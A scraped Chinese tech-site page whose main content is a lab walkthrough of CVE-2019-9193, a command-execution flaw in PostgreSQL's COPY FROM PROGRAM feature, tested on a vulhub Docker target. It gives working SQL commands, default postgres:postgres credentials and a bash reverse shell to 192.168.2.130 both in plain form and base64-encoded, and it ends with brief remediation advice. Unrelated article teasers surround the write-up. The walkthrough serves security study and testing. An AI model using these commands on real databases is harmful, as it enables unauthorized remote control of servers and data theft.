<em>Mac</em>Book项目 2009年学校开始实施<em>Mac</em>Book项目,所有师生配备一本<em>Mac</em>Book,并同步更新了校园无线网络。学校每周进行电脑技术更新,每月发送技术支持资料,极大改变了教学及学习方式。因此2011
2021-06-01 09:32:01
CVE-2019-9193之PostgreSQL 任意命令執行漏洞的問題
2022-08-01 18:07:24
起序:客戶內網測試的時候遇到的,搭建一個環境,寫個筆記記錄一下。
一、靶場環境
使用的是
github上的vulhub環境。PostgreSQL版本為10.7。
vulhub:https://github.com/vulhub/vulhub
1、任意命令執行
具有資料庫伺服器檔案讀取許可權的攻擊者可以利用此漏洞執行任意系統命令。
從 9.3 版本開始,Postgres 新增了一個 COPY TO/FROM PROGRAM 功能,允許資料庫的超級使用者以及 pg_read_server_files 組中的任何使用者執行作業系統命令。
漏洞利用前提:
需要登陸;需要高許可權;
所以要先弱口令爆破之後,然後檢視是否是高許可權。(對於PostgreSQL 來說,只有安裝資料庫時預設建立的超級使用者 postgres,類似於 Linux上的root使用者,擁有高許可權。)
新建資料庫使用者:CREATE USER
新建資料庫:CREATE DATABASE
刪除資料庫:DROP DATABASE
刪除使用者:DROP USER
復原許可權:REVOKE
賦權:GRANT
檢視許可權:https://www.modb.pro/db/53957
2、影響版本
受影響的版本(貌似更新版本無解)
PostgreSQL >= 9.3
二、漏洞利用
1、啟動靶機
docker-compose up -d
注:當測試完成之後會用到
關閉靶機的命令。不是現在就要使用的命令。
docker-compose down -v
2、Navicat 連線 PostgreSQL
賬號密碼:
postgres:postgres。
3、執行命令
右鍵
public,點選新建查詢。
然後就是執行下面的這些命令。
-- 先刪除你想要使用但是已經存在的表 DROP TABLE IF EXISTS cmd_exec; -- 建立儲存系統命令輸出的表 CREATE TABLE cmd_exec(cmd_output text); -- 執行系統命令利用特定函數 COPY cmd_exec FROM PROGRAM 'id'; -- 檢視執行結果 SELECT * FROM cmd_exec;
4、實戰拓展:反彈 shell 1、nc 監聽
在 kali 中使用 nc 進行監聽。
nc -lvvp 1314
2、執行反彈 shell 的命令
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM '/bin/bash -i >& /dev/tcp/192.168.2.130/1314 0>&1'; SELECT * FROM cmd_exec;
但是可以看出執行失敗了,這種方法不行。
3、反彈失敗
kali 也沒有得到 shell。
4、編碼解決
將反彈 shell 的命令 base64 編碼一下。(下面的解碼不用管)
# base64 編碼前 /bin/bash -i >& /dev/tcp/192.168.2.130/1314 0>&1 # base64 編碼後 L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMi4xMzAvMTMxNCAwPiYxCg==
5、再次執行反彈 shell 的命令
這裡的編碼不僅僅限於
base64,其他編碼形式也可以,主要是為了解決資料傳輸過程中的特殊字元被異常解析的問題。
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMi4xMzAvMTMxNCAwPiYxCg==" | base64 -d | bash'; SELECT * FROM cmd_exec;
6、反彈成功
三、漏洞修復
pg_read_server_files,pg_write_server_files 和 pg_execute_server_program角色涉及讀取和寫入具有大許可權的資料庫伺服器檔案。將此角色許可權分配給資料庫使用者時,應慎重考慮;- 增強密碼的複雜度;
- 進行網路隔離,限制 IP 存取,只允許需要的 IP 連線;
到此這篇關於CVE-2019-9193:PostgreSQL 任意命令執行漏洞的文章就介紹到這了,更多相關PostgreSQL 任意命令執行漏洞內容請搜尋it145.com以前的文章或繼續瀏覽下面的相關文章希望大家以後多多支援it145.com!
相關文章
-
黑科技的輕簡出行,告別「電量焦慮症」:Anker氮化鎵超能充系列
综合看Anker超能充系列的性价比很高,并且与不仅和iPhone12/苹果<em>Mac</em>Book很配,而且适合多设备充电需求的日常使用或差旅场景,不管是安卓还是Switch同样也能用得上它,希望这次分享能给准备购入充电器的小伙伴们有所
2021-06-01 09:31:42
-
吳亦凡廠牌首秀,L4WUDU居然忘詞了,Rapper和明星比還是有差距!
除了L4WUDU与吴亦凡已经多次共事,成为了明面上的厂牌成员,吴亦凡还曾带领20XXCLUB全队参加2020年的一场音乐节,这也是20XXCLUB首次全员合照,王嗣尧Turbo、陈彦希Regi、<em>Mac</em> Ova Seas、林渝植等人全部出场。然而让
2021-06-01 09:31:34
-
IPFS、Chia、Bzz和ICP挖礦該怎麼選?哪一個更有優勢?
目前应用IPFS的机构:1 谷歌<em>浏览器</em>支持IPFS分布式协议 2 万维网 (历史档案博物馆)数据库 3 火狐<em>浏览器</em>支持 IPFS分布式协议 4 EOS 等数字货币数据存储 5 美国国会图书馆,历史资料永久保存在 IPFS 6 加
2021-06-01 09:31:24
-
有哪些事是買了雪佛蘭後才知道的?美事偷著樂,開拓者車主隨聊
开拓者的车机是兼容苹果和<em>安卓</em>,虽然我不怎么用,但确实兼顾了我家人的很多需求:副驾的门板还配有解锁开关,有的时候老婆开车,下车的时候偶尔会忘记解锁,我在副驾驶可以自己开门:第二排设计很好,不仅配置了一个很大的
2021-06-01 09:30:48
-
iPhone12在618最新定價,跌價幅度超過1400元,還等iPhone13嗎?
不仅是<em>安卓</em>手机,苹果手机的降价力度也是前所未有了,iPhone12也“跳水价”了,发布价是6799元,如今已经跌至5308元,降价幅度超过1400元,最新定价确认了。iPhone12是苹果首款5G手机,同时也是全球首款5nm芯片的智能机,它
2021-06-01 09:30:45